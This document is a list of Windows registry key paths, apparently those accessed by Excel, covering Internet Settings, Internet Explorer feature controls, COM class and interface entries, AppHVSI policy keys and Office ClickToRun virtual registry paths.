HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Containers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Containers
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Containers\SecureAutoProxy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\dnscache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download\FeatureEnableTokenBindingOverride
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_TOKEN_BINDING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_TOKEN_BINDING
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_TOKEN_BINDING
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableHttp2ConnectionSharing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableHttp2ConnectionSharing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableTlsAnonymousClientAuthFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyAuthenticationSchemes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyAuthenticationSchemes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyLinkLocalNameResolution
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyLinkLocalNameResolution
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{9F6C78EF-FCE5-42FA-ABEA-3E7DF91921DC}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{9F6C78EF-FCE5-42FA-ABEA-3E7DF91921DC}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{9F6C78EF-FCE5-42FA-ABEA-3E7DF91921DC}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{9F6C78EF-FCE5-42FA-ABEA-3E7DF91921DC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{9F6C78EF-FCE5-42FA-ABEA-3E7DF91921DC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{9F6C78EF-FCE5-42FA-ABEA-3E7DF91921DC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{9F6C78EF-FCE5-42FA-ABEA-3E7DF91921DC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InProcHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\PolicyType
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\Behavior
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\MergeAlgorithm
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\RegKeyPathRedirectMapped
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\RegKeyPathRedirect
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicyname
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicypath
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicyismultisz
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicymultiszSeparatorChar
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataUser
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataDevice
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataBoth
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\30Value
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\Value
HKEY_LOCAL_MACHINE\software\policies\Microsoft\AppHVSI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\PolicyManager\current\Device\AppHVSI
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\current\Device\AppHVSI
HKEY_CLASSES_ROOT\CLSID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000034b-0000-0000-c000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\UBR
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpandedLines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpanded
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyQueryWithFullUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyQueryWithFullUrl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Containers\SendDnsToHost
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableCachingNegativeProxyResults
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableCachingNegativeProxyResults
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp2Upgrade
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableTcpFastOpen
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EdpEnforcementOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EdpEnforcementOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll\PolicySubPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\QuicTestHost
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\AutoProxyAutoLogonIfChallenged
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttpLowerCaseHost
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\windows\CurrentVersion\Internet Settings\WinHttpLowerCaseHost
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\Compatibility\EXCEL.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\0
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\0
